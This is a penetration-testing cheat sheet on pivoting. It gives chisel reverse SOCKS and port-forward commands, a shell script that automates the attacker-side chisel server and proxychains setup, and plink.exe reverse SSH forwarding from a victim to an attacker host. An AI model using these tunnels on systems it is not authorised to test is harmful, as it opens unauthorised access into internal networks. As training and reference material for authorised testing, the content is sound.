Pivoting Techniques

https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding

https://michmich.eu/Cheatsheets/internal/07-pivoting/

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Network%20Pivoting%20Techniques.md

Chisel

You can download it from the releases page of https://github.com/jpillora/chisel. Use the same release for client and server; mixing versions is the first thing to rule out when the client connects but the tunnel never comes up.

SOCKS

./chisel server -p 8080 --reverse   # Server: attacker. --reverse allows the client to open listeners on this host

./chisel-x64.exe client 10.10.14.3:8080 R:socks   # Client: victim. R:socks opens a SOCKS5 listener on the attacker, port 1080 by default

# Now point proxychains at 127.0.0.1:1080 (its default) on the attacker. proxychains only wraps TCP connect(), so scan through it with nmap -sT -Pn (no SYN scans, no ICMP).

./chisel server -v -p 8080 --socks5   # Server: victim (port 8080 must be reachable from the attacker)

./chisel client -v 10.10.10.10:8080 socks   # Client: attacker. Opens a local SOCKS5 listener on 127.0.0.1:1080 whose traffic exits from the victim

Port forwarding

./chisel_1.7.6_linux_amd64 server -p 12312 --reverse   # Server: attacker

./chisel_1.7.6_linux_amd64 client 10.10.14.20:12312 R:4505:127.0.0.1:4505   # Client: victim. Port 4505 on the attacker now reaches 127.0.0.1:4505 on the victim
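The two chisel setups above (reverse SOCKS and reverse port forward) are usually combined: one client invocation can carry several R: remotes, and the attacker side has to start the server, wait for the reverse listener, and configure proxychains to match. The script below is an added example, not code from the original page or from the chisel project. It validates each remote before anything is run, builds the client line to paste on the victim, and writes the proxychains config for whatever SOCKS port the remotes imply. Assumed, not taken from the page: the attacker listens on 10.10.14.3:8080, the binary is ./chisel, and the config goes to /tmp/pivot.conf; the server is started with --auth so that only a client holding the credential can open listeners on our machine (otherwise anyone who can reach port 8080 can).

```sh
#!/bin/sh
# Added example (not from the original page or the chisel project): helpers for
# the attacker side of a chisel reverse pivot. Assumptions: attacker at
# 10.10.14.3:8080, chisel binary ./chisel, proxychains config in /tmp/pivot.conf.

ATTACKER="${ATTACKER:-10.10.14.3}"
CHISEL_PORT="${CHISEL_PORT:-8080}"
CHISEL_BIN="${CHISEL_BIN:-./chisel}"

# chisel_remote_ok SPEC -> 0 if SPEC is a well-formed client-side reverse remote:
#   R:socks                   SOCKS5 listener on the server, default port 1080
#   R:<port>:socks            SOCKS5 listener on the server on <port>
#   R:<port>:<host>:<rport>   server port <port> forwarded to <host>:<rport>
#                             as reachable from the client (victim)
chisel_remote_ok() {
  printf '%s\n' "$1" | grep -Eq '^R:([0-9]{1,5}:)?socks$' && return 0
  printf '%s\n' "$1" | grep -Eq '^R:[0-9]{1,5}:[A-Za-z0-9.-]+:[0-9]{1,5}$' && return 0
  return 1
}

# socks_port SPEC... -> prints the server-side SOCKS port implied by the remotes
# (1080 for a bare "R:socks"); returns 1 when no SOCKS remote is present.
socks_port() {
  for r in "$@"; do
    case "$r" in
      R:socks)   echo 1080; return 0 ;;
      R:*:socks) echo "$r" | cut -d: -f2; return 0 ;;
    esac
  done
  return 1
}

# chisel_client_cmd SERVER SPEC... -> prints the line to run on the victim.
# Flags must precede the server address (chisel uses Go's flag parser), so an
# optional CHISEL_AUTH credential is emitted before it. Fails on a bad remote.
chisel_client_cmd() {
  server="$1"; shift
  for r in "$@"; do
    chisel_remote_ok "$r" || { echo "bad remote: $r" >&2; return 1; }
  done
  printf '%s client' "$CHISEL_BIN"
  [ -n "${CHISEL_AUTH:-}" ] && printf ' --auth %s' "$CHISEL_AUTH"
  printf ' %s' "$server" "$@"
  printf '\n'
}

# proxychains_conf PORT -> prints a proxychains config that sends every TCP
# connect (and DNS, via proxy_dns) into the SOCKS5 listener chisel opened locally.
proxychains_conf() {
  cat <<EOF
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 127.0.0.1 $1
EOF
}

# pivot_up SPEC... : start the server, print the victim-side command, wait for
# the reverse SOCKS listener to appear, then write the proxychains config.
pivot_up() {
  CHISEL_AUTH="pivot:$(head -c 12 /dev/urandom | od -An -tx1 | tr -d ' \n')"
  "$CHISEL_BIN" server -p "$CHISEL_PORT" --reverse --auth "$CHISEL_AUTH" &
  echo "run on the victim: $(chisel_client_cmd "$ATTACKER:$CHISEL_PORT" "$@")"
  port="$(socks_port "$@")" || return 0          # forwards only: nothing to wait for
  n=0
  until ss -ltn | grep -q ":$port "; do          # the listener appears once the victim connects
    n=$((n + 1))
    [ "$n" -lt 60 ] || { echo "no reverse listener on $port after 120s" >&2; return 1; }
    sleep 2
  done
  proxychains_conf "$port" > /tmp/pivot.conf
  echo "use: proxychains4 -f /tmp/pivot.conf -q nmap -sT -Pn -p 22,445 10.10.10.0/24"
}

if [ "${PIVOT_RUN:-0}" = 1 ]; then
  pivot_up "$@"
fi
```

Run it as `PIVOT_RUN=1 sh pivot.sh R:socks R:4505:127.0.0.1:4505` to get both a SOCKS pivot and a dedicated forward from one client session; the helpers can also be sourced and called individually. The wait loop matters because the listener on our side does not exist until the victim's client has connected, so a proxychains run started too early fails with a connection refused that looks like a tooling problem rather than a timing one.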

Plink.exe

Plink is the command-line counterpart of PuTTY; its options are very similar to those of an OpenSSH client.

Because this binary runs on the victim and is an SSH client, we need an SSH service listening on our machine, on a port the victim can reach, so the victim can connect back to us. Use a throwaway, unprivileged account for this: the password is passed on the command line (-pw), so it shows up in process listings and command-line logging on the victim, and whoever recovers it gets SSH access to our host. Then, to forward a port that is only reachable from the victim to a port on our machine:

echo y | plink.exe -l <Our_valid_username> -pw <valid_password> [-p <port>] -R <port_in_our_host>:<next_ip>:<final_port> <your_ip>

echo y | plink.exe -l root -pw password [-p 2222] -R 9090:127.0.0.1:9090 10.11.0.41   # the victim's local port 9090 is now reachable on our port 9090

The "echo y" answers plink's prompt to trust our host key on first connection; add -N if you only need the tunnel and not a shell on our host.
